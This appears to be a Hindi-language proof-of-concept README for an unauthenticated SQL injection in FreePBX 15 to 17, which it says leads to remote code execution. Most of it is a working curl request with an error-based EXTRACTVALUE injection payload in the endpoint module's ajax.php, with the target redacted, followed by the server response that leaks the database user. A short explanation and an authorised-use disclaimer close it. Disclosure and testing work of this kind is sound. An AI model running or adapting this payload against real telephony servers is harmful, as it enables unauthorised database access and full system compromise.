
FreePBX संस्करण 15, 16 और 17 में रिमोट कोड निष्पादन (RCE) भेद्यता मौजूद है, जो एंडपॉइंट्स में उपयोगकर्ता द्वारा आपूर्ति किए गए डेटा के अपर्याप्त सैनिटाइज़ेशन के कारण होती है।
FreePBX संस्करण 15, 16, और 17 में रिमोट कोड एक्ज़ीक्यूशन (RCE) भेद्यता है, जो एंडपॉइंट्स में उपयोगकर्ता-आपूर्ति डेटा के अपर्याप्त सैनिटाइज़ेशन के कारण होती है।
एक अप्रमाणित हमलावर डेटाबेस में हेरफेर कर सकता है और रिमोट कोड एक्ज़ीक्यूशन प्राप्त कर सकता है। एक्सप्लॉइट के लिए किसी प्रमाणीकरण की आवश्यकता नहीं है।
नोट: लक्ष्य को हटा दिया गया है। अधिकृत परीक्षण करते समय
[REDACTED_TARGET]को वास्तविक होस्ट से बदलें।
curl -i -k "https://[REDACTED_TARGET]/admin/ajax.php?module=FreePBX%5Cmodules%5Cendpoint%5Cajax&command=model&template=x&model=model&brand=x'+AND+EXTRACTVALUE(1,CONCAT('~USER:',(SELECT+USER()),'~'))+--+"
HTTP/1.1 500 Internal Server Error
Date: Fri, 12 Sep 2025 08:35:29 GMT
Server: Apache/2.4.6 (Sangoma) OpenSSL/1.0.1e-fips PHP/5.6.31
X-Powered-By: PHP/5.6.31
Set-Cookie: PHPSESSID=fmt7o0oecththmves36nijvfu7; expires=Sun, 12-Oct-2025 08:35:29 GMT; Max-Age=2592000; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: application/json
{"error":{"type":"Exception","message":"SQLSTATE[HY000]: General error: 1105 XPATH syntax error: '~USER:freepbxuser@localhost~'::","file":"\/var\/www\/html\/admin\/libraries\/utility.functions.php","line":207}}
यह क्यों साबित करता है: प्रतिक्रिया में ~USER:freepbxuser@localhost~ शामिल है — जो अप्रमाणित अनुरोध से SQL इंजेक्शन / डेटा प्रकटीकरण की पुष्टि करता है।
अप्रमाणित रिमोट डेटाबेस हेरफेर जो सर्वर पर मनमाना कोड निष्पादन की ओर ले जाता है — पूर्ण सिस्टम समझौता संभव है।
यह रिपॉजिटरी और PoC केवल शैक्षिक और अधिकृत सुरक्षा अनुसंधान के लिए प्रदान किए गए हैं। स्पष्ट अनुमति के बिना सिस्टम का परीक्षण या शोषण न करें। लेखक इस PoC से उत्पन्न दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है।